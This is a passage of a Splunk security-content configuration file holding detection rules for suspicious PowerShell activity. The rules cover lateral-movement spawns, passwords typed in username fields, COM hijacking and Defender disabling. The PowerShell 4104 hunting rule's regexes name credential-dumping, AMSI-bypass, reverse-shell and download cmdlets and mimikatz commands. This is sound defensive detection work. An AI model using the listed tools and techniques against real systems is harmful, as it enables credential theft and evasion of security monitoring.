2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Possible Lateral Movement PowerShell Spawn - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A PowerShell process was spawned as a child process of typically abused processes on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Possible Lateral Movement PowerShell Spawn - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.003", "T1021.006", "T1047", "T1053.005", "T1543.003", "T1059.001", "T1218.014"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to identify possible lateral movement attacks that involve the spawning of a PowerShell process as a child or grandchild process of commonly abused processes. These processes include services.exe, wmiprsve.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.\ Such behavior is indicative of legitimate Windows features such as the Service Control Manager, Windows Management Instrumentation, Task Scheduler, Windows Remote Management, and the DCOM protocol being abused to start a process on a remote endpoint. This behavior is often seen during lateral movement techniques where adversaries or red teams abuse these services for lateral movement and remote code execution. action.notable.param.rule_title = Possible Lateral Movement PowerShell Spawn action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=wmiprvse.exe OR Processes.parent_process_name=services.exe OR Processes.parent_process_name=svchost.exe OR Processes.parent_process_name=wsmprovhost.exe OR Processes.parent_process_name=mmc.exe) (Processes.process_name=powershell.exe OR (Processes.process_name=cmd.exe AND Processes.process=*powershell.exe*) OR Processes.process_name=pwsh.exe OR (Processes.process_name=cmd.exe AND Processes.process=*pwsh.exe*)) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `possible_lateral_movement_powershell_spawn_filter` [ESCU - Potential password in username - Rule] action.escu = 0 action.escu.enabled = 1 description = This search identifies users who have entered their passwords in username fields. This is done by looking for failed authentication attempts using usernames with a length longer than 7 characters and a high Shannon entropy, and looks for the next successful authentication attempt from the same source system to the same destination system as the failed attempt. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.003", "T1552.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search identifies users who have entered their passwords in username fields. This is done by looking for failed authentication attempts using usernames with a length longer than 7 characters and a high Shannon entropy, and looks for the next successful authentication attempt from the same source system to the same destination system as the failed attempt. action.escu.how_to_implement = To successfully implement this search, you need to have relevant authentication logs mapped to the Authentication data model. You also need to have the Splunk TA URL Toolbox (https://splunkbase.splunk.com/app/2734/) installed. The detection must run with a time interval shorter than endtime+1000. action.escu.known_false_positives = Valid usernames with high entropy or source/destination system pairs with multiple authenticating users will make it difficult to identify the real user authenticating. action.escu.creation_date = 2022-05-11 action.escu.modification_date = 2022-05-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Potential password in username - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Credential Dumping", "Insider Threat"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Potential password in username - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Insider Threat"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.003", "T1552.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` earliest(_time) AS starttime latest(_time) AS endtime latest(sourcetype) AS sourcetype values(Authentication.src) AS src values(Authentication.dest) AS dest count FROM datamodel=Authentication WHERE nodename=Authentication.Failed_Authentication BY "Authentication.user" | `drop_dm_object_name(Authentication)` | lookup ut_shannon_lookup word AS user | where ut_shannon>3 AND len(user)>=8 AND mvcount(src) == 1 | sort count, - ut_shannon | eval incorrect_cred=user | eval endtime=endtime+1000 | map maxsearches=70 search="| tstats `security_content_summariesonly` earliest(_time) AS starttime latest(_time) AS endtime latest(sourcetype) AS sourcetype values(Authentication.src) AS src values(Authentication.dest) AS dest count FROM datamodel=Authentication WHERE nodename=Authentication.Successful_Authentication Authentication.src=\"$src$\" Authentication.dest=\"$dest$\" sourcetype IN (\"$sourcetype$\") earliest=\"$starttime$\" latest=\"$endtime$\" BY \"Authentication.user\" | `drop_dm_object_name(\"Authentication\")` | `potential_password_in_username_false_positive_reduction` | eval incorrect_cred=\"$incorrect_cred$\" | eval ut_shannon=\"$ut_shannon$\" | sort count" | where user!=incorrect_cred | outlier action=RM count | `potential_password_in_username_filter` [ESCU - Potentially malicious code on commandline - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic uses a pretrained machine learning text classifier to detect potentially malicious commandlines. The model identifies unusual combinations of keywords found in samples of commandlines where adversaries executed powershell code, primarily for C2 communication. For example, adversaries will leverage IO capabilities such as "streamreader" and "webclient", threading capabilties such as "mutex" locks, programmatic constructs like "function" and "catch", and cryptographic operations like "computehash". Although observing one of these keywords in a commandline script is possible, combinations of keywords observed in attack data are not typically found in normal usage of the commandline. The model will output a score where all values above zero are suspicious, anything greater than one particularly so. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic uses a pretrained machine learning text classifier to detect potentially malicious commandlines. The model identifies unusual combinations of keywords found in samples of commandlines where adversaries executed powershell code, primarily for C2 communication. For example, adversaries will leverage IO capabilities such as "streamreader" and "webclient", threading capabilties such as "mutex" locks, programmatic constructs like "function" and "catch", and cryptographic operations like "computehash". Although observing one of these keywords in a commandline script is possible, combinations of keywords observed in attack data are not typically found in normal usage of the commandline. The model will output a score where all values above zero are suspicious, anything greater than one particularly so. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This model is an anomaly detector that identifies usage of APIs and scripting constructs that are correllated with malicious activity. These APIs and scripting constructs are part of the programming langauge and advanced scripts may generate false positives. action.escu.creation_date = 2022-01-14 action.escu.modification_date = 2022-01-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Potentially malicious code on commandline - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions"] action.risk = 1 action.risk.param._risk_message = Unusual command-line execution with hallmarks of malicious activity run by $user$ found on $dest$ with commandline $process$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Potentially malicious code on commandline - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions"], "cis20": ["CIS 10"], "confidence": 20, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel="Endpoint.Processes" by Processes.parent_process_name Processes.process_name Processes.process Processes.user Processes.dest | `drop_dm_object_name(Processes)` | where len(process) > 200 | `potentially_malicious_code_on_cmdline_tokenize_score` | apply unusual_commandline_detection | eval score='predicted(unusual_cmdline_logits)', process=orig_process | fields - unusual_cmdline* predicted(unusual_cmdline_logits) orig_process | where score > 0.5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `potentially_malicious_code_on_commandline_filter` [ESCU - PowerShell 4104 Hunting - Rule] action.escu = 0 action.escu.enabled = 1 description = The following Hunting analytic assists with identifying suspicious PowerShell execution using Script Block Logging, or EventCode 4104. This analytic is not meant to be ran hourly, but occasionally to identify malicious or suspicious PowerShell. This analytic is a combination of work completed by Alex Teixeira and Splunk Threat Research Team. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following Hunting analytic assists with identifying suspicious PowerShell execution using Script Block Logging, or EventCode 4104. This analytic is not meant to be ran hourly, but occasionally to identify malicious or suspicious PowerShell. This analytic is a combination of work completed by Alex Teixeira and Splunk Threat Research Team. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Limited false positives. May filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell 4104 Hunting - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Rhysida Ransomware", "DarkGate Malware", "Flax Typhoon", "CISA AA23-347A", "Data Destruction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell 4104 Hunting - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Rhysida Ransomware", "DarkGate Malware", "Flax Typhoon", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 | eval DoIt = if(match(ScriptBlockText,"(?i)(\$doit)"), "4", 0) | eval enccom=if(match(ScriptBlockText,"[A-Za-z0-9+\/]{44,}([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)") OR match(ScriptBlockText, "(?i)[-]e(nc*o*d*e*d*c*o*m*m*a*n*d*)*\s+[^-]"),4,0) | eval suspcmdlet=if(match(ScriptBlockText, "(?i)Add-Exfiltration|Add-Persistence|Add-RegBackdoor|Add-ScrnSaveBackdoor|Check-VM|Do-Exfiltration|Enabled-DuplicateToken|Exploit-Jboss|Find-Fruit|Find-GPOLocation|Find-TrustedDocuments|Get-ApplicationHost|Get-ChromeDump|Get-ClipboardContents|Get-FoxDump|Get-GPPPassword|Get-IndexedItem|Get-Keystrokes|LSASecret|Get-PassHash|Get-RegAlwaysInstallElevated|Get-RegAutoLogon|Get-RickAstley|Get-Screenshot|Get-SecurityPackages|Get-ServiceFilePermission|Get-ServicePermission|Get-ServiceUnquoted|Get-SiteListPassword|Get-System|Get-TimedScreenshot|Get-UnattendedInstallFile|Get-Unconstrained|Get-VaultCredential|Get-VulnAutoRun|Get-VulnSchTask|Gupt-Backdoor|HTTP-Login|Install-SSP|Install-ServiceBinary|Invoke-ACLScanner|Invoke-ADSBackdoor|Invoke-ARPScan|Invoke-AllChecks|Invoke-BackdoorLNK|Invoke-BypassUAC|Invoke-CredentialInjection|Invoke-DCSync|Invoke-DllInjection|Invoke-DowngradeAccount|Invoke-EgressCheck|Invoke-Inveigh|Invoke-InveighRelay|Invoke-Mimikittenz|Invoke-NetRipper|Invoke-NinjaCopy|Invoke-PSInject|Invoke-Paranoia|Invoke-PortScan|Invoke-PoshRat|Invoke-PostExfil|Invoke-PowerDump|Invoke-PowerShellTCP|Invoke-PsExec|Invoke-PsUaCme|Invoke-ReflectivePEInjection|Invoke-ReverseDNSLookup|Invoke-RunAs|Invoke-SMBScanner|Invoke-SSHCommand|Invoke-Service|Invoke-Shellcode|Invoke-Tater|Invoke-ThunderStruck|Invoke-Token|Invoke-UserHunter|Invoke-VoiceTroll|Invoke-WScriptBypassUAC|Invoke-WinEnum|MailRaider|New-HoneyHash|Out-Minidump|Port-Scan|PowerBreach|PowerUp|PowerView|Remove-Update|Set-MacAttribute|Set-Wallpaper|Show-TargetScreen|Start-CaptureServer|VolumeShadowCopyTools|NEEEEWWW|(Computer|User)Property|CachedRDPConnection|get-net\S+|invoke-\S+hunter|Install-Service|get-\S+(credent|password)|remoteps|Kerberos.*(policy|ticket)|netfirewall|Uninstall-Windows|Verb\s+Runas|AmsiBypass|nishang|Invoke-Interceptor|EXEonRemote|NetworkRelay|PowerShelludp|PowerShellIcmp|CreateShortcut|copy-vss|invoke-dll|invoke-mass|out-shortcut|Invoke-ShellCommand"),1,0) | eval base64 = if(match(lower(ScriptBlockText),"frombase64"), "4", 0) | eval empire=if(match(lower(ScriptBlockText),"system.net.webclient") AND match(lower(ScriptBlockText), "frombase64string") ,5,0) | eval mimikatz=if(match(lower(ScriptBlockText),"mimikatz") OR match(lower(ScriptBlockText), "-dumpcr") OR match(lower(ScriptBlockText), "SEKURLSA::Pth") OR match(lower(ScriptBlockText), "kerberos::ptt") OR match(lower(ScriptBlockText), "kerberos::golden") ,5,0) | eval iex=if(match(ScriptBlockText, "(?i)iex|invoke-expression"),2,0) | eval webclient=if(match(lower(ScriptBlockText),"http") OR match(lower(ScriptBlockText),"web(client|request)") OR match(lower(ScriptBlockText),"socket") OR match(lower(ScriptBlockText),"download(file|string)") OR match(lower(ScriptBlockText),"bitstransfer") OR match(lower(ScriptBlockText),"internetexplorer.application") OR match(lower(ScriptBlockText),"xmlhttp"),5,0) | eval get = if(match(lower(ScriptBlockText),"get-"), "1", 0) | eval rundll32 = if(match(lower(ScriptBlockText),"rundll32"), "4", 0) | eval suspkeywrd=if(match(ScriptBlockText, "(?i)(bitstransfer|mimik|metasp|AssemblyBuilderAccess|Reflection\.Assembly|shellcode|injection|cnvert|shell\.application|start-process|Rc4ByteStream|System\.Security\.Cryptography|lsass\.exe|localadmin|LastLoggedOn|hijack|BackupPrivilege|ngrok|comsvcs|backdoor|brute.?force|Port.?Scan|Exfiltration|exploit|DisableRealtimeMonitoring|beacon)"),1,0) | eval syswow64 = if(match(lower(ScriptBlockText),"syswow64"), "3", 0) | eval httplocal = if(match(lower(ScriptBlockText),"http://127.0.0.1"), "4", 0) | eval reflection = if(match(lower(ScriptBlockText),"reflection"), "1", 0) | eval invokewmi=if(match(lower(ScriptBlockText), "(?i)(wmiobject|WMIMethod|RemoteWMI|PowerShellWmi|wmicommand)"),5,0) | eval downgrade=if(match(ScriptBlockText, "(?i)([-]ve*r*s*i*o*n*\s+2)") OR match(lower(ScriptBlockText),"powershell -version"),3,0) | eval compressed=if(match(ScriptBlockText, "(?i)GZipStream|::Decompress|IO.Compression|write-zip|(expand|compress)-Archive"),5,0) | eval invokecmd = if(match(lower(ScriptBlockText),"invoke-command"), "4", 0) | addtotals fieldname=Score DoIt, enccom, suspcmdlet, suspkeywrd, compressed, downgrade, mimikatz, iex, empire, rundll32, webclient, syswow64, httplocal, reflection, invokewmi, invokecmd, base64, get | stats values(Score) by UserID, Computer, DoIt, enccom, compressed, downgrade, iex, mimikatz, rundll32, empire, webclient, syswow64, httplocal, reflection, invokewmi, invokecmd, base64, get, suspcmdlet, suspkeywrd | rename Computer as dest, UserID as user | `powershell_4104_hunting_filter` [ESCU - PowerShell - Connect To Internet With Hidden Window - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic identifies PowerShell commands utilizing the WindowStyle parameter to hide the window on the compromised endpoint. This combination of command-line options is suspicious because it is overriding the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Removed in this version of the query is New-Object. The analytic identifies all variations of WindowStyle, as PowerShell allows the ability to shorten the parameter. For example w, win, windowsty and so forth. In addition, through our research it was identified that PowerShell will interpret different command switch types beyond the hyphen. We have added endash, emdash, horizontal bar, and forward slash. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic identifies PowerShell commands utilizing the WindowStyle parameter to hide the window on the compromised endpoint. This combination of command-line options is suspicious because it is overriding the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Removed in this version of the query is New-Object. The analytic identifies all variations of WindowStyle, as PowerShell allows the ability to shorten the parameter. For example w, win, windowsty and so forth. In addition, through our research it was identified that PowerShell will interpret different command switch types beyond the hyphen. We have added endash, emdash, horizontal bar, and forward slash. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate process can have this combination of command-line options, but it's not common. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell - Connect To Internet With Hidden Window - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AgentTesla", "HAFNIUM Group", "Hermetic Wiper", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Malicious PowerShell", "Data Destruction", "Log4Shell CVE-2021-44228"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell - Connect To Internet With Hidden Window - Rule action.correlationsearch.annotations = {"analytic_story": ["AgentTesla", "HAFNIUM Group", "Hermetic Wiper", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Malicious PowerShell", "Data Destruction", "Log4Shell CVE-2021-44228"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-44228"], "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name Processes.dest Processes.process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"(?i)[\-|\/|||]w(in*d*o*w*s*t*y*l*e*)*\s+[^-]") | `powershell___connect_to_internet_with_hidden_window_filter` [ESCU - Powershell COM Hijacking InprocServer32 Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell ScriptBlock Logging to identify a script that is attempting to modify or add a component object model to inprocserver32 path within the registry. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell ScriptBlock Logging to identify a script that is attempting to modify or add a component object model to inprocserver32 path within the registry. action.escu.how_to_implement = The following analytic requires PowerShell operational logs to be imported. Modify the PowerShell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = False positives will be present if any scripts are adding to inprocserver32. Filter as needed. action.escu.creation_date = 2022-09-26 action.escu.modification_date = 2022-09-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell COM Hijacking InprocServer32 Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell"] action.risk = 1 action.risk.param._risk_message = A PowerShell script has been identified with InProcServer32 within the script code on $Computer$. action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell COM Hijacking InprocServer32 Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell ScriptBlock Logging to identify a script that is attempting to modify or add a component object model to inprocserver32 path within the registry. action.notable.param.rule_title = Powershell COM Hijacking InprocServer32 Modification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Software\\Classes\\CLSID\\*\\InProcServer32*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_com_hijacking_inprocserver32_modification_filter` [ESCU - Powershell Creating Thread Mutex - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using the `mutex` function. This function is commonly seen in some obfuscated PowerShell scripts to make sure that only one instance of there process is running on a compromise machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1027", "T1027.005", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using the `mutex` function. This function is commonly seen in some obfuscated PowerShell scripts to make sure that only one instance of there process is running on a compromise machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = powershell developer may used this function in their script for instance checking too. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Creating Thread Mutex - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains Thread Mutex in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Creating Thread Mutex - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1027", "T1027.005", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is using the `mutex` function. This function is commonly seen in some obfuscated PowerShell scripts to make sure that only one instance of there process is running on a compromise machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.notable.param.rule_title = Powershell Creating Thread Mutex action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Threading.Mutex*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_creating_thread_mutex_filter` [ESCU - Powershell Disable Security Monitoring - Rule] action.escu = 0 action.escu.enabled = 1 description = This search identifies a modification in registry to disable the windows defender real time behavior monitoring. This event or technique is commonly seen in RATs, bots, or Trojans to disable AV to evade detections. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search identifies a modification in registry to disable the windows defender real time behavior monitoring. This event or technique is commonly seen in RATs, bots, or Trojans to disable AV to evade detections. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives. However, tune based on scripts that may perform this action. action.escu.creation_date = 2022-07-15 action.escu.modification_date = 2022-07-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Disable Security Monitoring - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware"] action.risk = 1 action.risk.param._risk_message = Windows Defender Real-time Behavior Monitoring disabled on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Disable Security Monitoring - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search identifies a modification in registry to disable the windows defender real time behavior monitoring. This event or technique is commonly seen in RATs, bots, or Trojans to disable AV to evade detections. action.notable.param.rule_title = Powershell Disable Security Monitoring action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process="*set-mppreference*" AND Processes.process IN ("*disablerealtimemonitoring*","*disableioavprotection*","*disableintrusionpreventionsystem*","*disablescriptscanning*","*disableblockatfirstseen*","*DisableBehaviorMonitoring*","*drtm 